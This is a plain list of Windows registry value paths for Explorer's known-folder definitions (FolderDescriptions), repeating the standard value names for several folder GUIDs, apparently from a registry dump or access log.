HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{76FC4E2D-D6AD-4519-A663-37BD56068185}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{491E922F-5643-4AF4-A7EB-4E7A138D8174}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{33E28130-4E1E-4676-835A-98395C3BC3BB}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8AD10C31-2ADB-4296-A8F7-E4701232C972}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{DEBF2536-E1A8-4C59-B6A2-414586476AEA}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}\Roamable
